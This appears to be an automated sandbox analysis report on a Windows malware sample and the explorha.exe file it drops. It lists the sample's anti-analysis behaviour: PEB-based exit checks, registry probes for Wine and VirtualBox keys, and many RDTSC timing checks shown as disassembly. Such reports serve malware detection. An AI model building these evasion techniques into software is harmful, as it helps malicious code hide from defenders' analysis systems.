Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: E7EFE1 second address: E7EFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: E7EFEE second address: E7EFF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF24F9 second address: FF2501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF2501 second address: FF2506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE0424 second address: FE042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE042E second address: FE0434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE0434 second address: FE043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF1707 second address: FF1711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F449CC63D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF19FD second address: FF1A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF1CD3 second address: FF1CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF1CE8 second address: FF1CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF42E3 second address: FF435C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D5Bh], ebx 0x0000000f push 00000000h 0x00000011 add esi, 7F8E79C4h 0x00000017 call 00007F449CC63D79h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D88h 0x00000022 pop eax 0x00000023 push eax 0x00000024 jmp 00007F449CC63D84h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jl 00007F449CC63D7Eh 0x00000033 jns 00007F449CC63D78h 0x00000039 push eax 0x0000003a pop eax 0x0000003b mov eax, dword ptr [eax] 0x0000003d pushad 0x0000003e ja 00007F449CC63D81h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF435C second address: FF4360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF4360 second address: FF43F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ecx 0x00000010 jmp 00007F449CC63D84h 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 mov edi, dword ptr [ebp+122D3B9Ch] 0x0000001d push 00000003h 0x0000001f jo 00007F449CC63D7Ch 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F449CC63D78h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D3BE8h] 0x00000047 push 00000003h 0x00000049 call 00007F449CC63D79h 0x0000004e push eax 0x0000004f push eax 0x00000050 jnc 00007F449CC63D76h 0x00000056 pop eax 0x00000057 pop eax 0x00000058 push eax 0x00000059 jmp 00007F449CC63D83h 0x0000005e mov eax, dword ptr [esp+04h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF43F4 second address: FF43F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF43F8 second address: FF43FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF43FE second address: FF4404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF44BE second address: FF4500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F449CC63D78h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 xor dword ptr [ebp+122D1DCEh], edx 0x0000002a pop ecx 0x0000002b push 984C87ACh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF4500 second address: FF454C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F449CEB0738h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 67B378D4h 0x00000013 js 00007F449CEB073Eh 0x00000019 push esi 0x0000001a mov edi, dword ptr [ebp+122D3E28h] 0x00000020 pop edx 0x00000021 push 00000003h 0x00000023 jmp 00007F449CEB073Dh 0x00000028 push 00000000h 0x0000002a mov dx, 9128h 0x0000002e push 00000003h 0x00000030 add dh, FFFFFFD2h 0x00000033 push 8F6B59D9h 0x00000038 pushad 0x00000039 jns 00007F449CEB0738h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF454C second address: FF4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF4552 second address: FF457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 4F6B59D9h 0x0000000d mov dword ptr [ebp+122D1CBEh], ebx 0x00000013 lea ebx, dword ptr [ebp+124491EEh] 0x00000019 mov si, 644Dh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F449CEB073Ch 0x00000026 jnl 00007F449CEB0736h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF457E second address: FF4588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F449CC63D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF4588 second address: FF458C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FF467A second address: FF467E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10156B5 second address: 10156B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10156B9 second address: 10156C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F449CC63D76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10156C7 second address: 10156CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10156CD second address: 10156F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F449CC63D86h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10156F8 second address: 101570A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE710C second address: FE712E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D88h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE712E second address: FE7134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE7134 second address: FE7138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013640 second address: 101364A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10137AB second address: 10137B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10137B0 second address: 10137B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013D5C second address: 1013D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013D60 second address: 1013D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F449CEB0740h 0x00000015 jc 00007F449CEB0736h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013D86 second address: 1013D90 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F449CC63D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013D90 second address: 1013DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013DA2 second address: 1013DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1013DA7 second address: 1013DB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F449CEB073Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1014211 second address: 101421A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 101421A second address: 1014224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1014224 second address: 1014247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F449CC63D88h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 101439C second address: 10143A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 101452B second address: 1014546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D86h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10147F4 second address: 1014816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0741h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007F449CEB0736h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1007C9E second address: 1007CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1007CA4 second address: 1007CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1007CA8 second address: 1007CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F449CC63D7Ch 0x0000000c jmp 00007F449CC63D7Ah 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1007CC8 second address: 1007CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F449CEB0736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1007CD4 second address: 1007CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1007CD8 second address: 1007CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F449CEB073Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F449CEB073Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
